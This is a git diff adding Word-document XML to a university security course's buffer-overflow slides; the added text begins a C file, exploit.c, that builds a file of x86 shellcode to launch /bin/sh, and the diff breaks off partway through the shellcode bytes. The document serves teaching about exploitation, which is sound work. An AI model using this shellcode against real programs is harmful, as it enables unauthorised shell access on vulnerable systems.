--- a/COSC402_545_Software_OS_Security/MyPPTs/4_BufferOverflow/exploit.docx
+++ b/COSC402_545_Software_OS_Security/MyPPTs/4_BufferOverflow/exploit.docx
@@ -43,6 +43,6328 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>exploit.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>/* A program that creates a file containing code for launching shell */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stdlib.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stdio.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>#include &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>string.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shellcode[]=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x31\xc0"             /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>xorl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x50"                 /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x68""//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"           /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x68732f2f            */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x68""/bin"           /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x6e69622f            */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x89\xe3"             /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
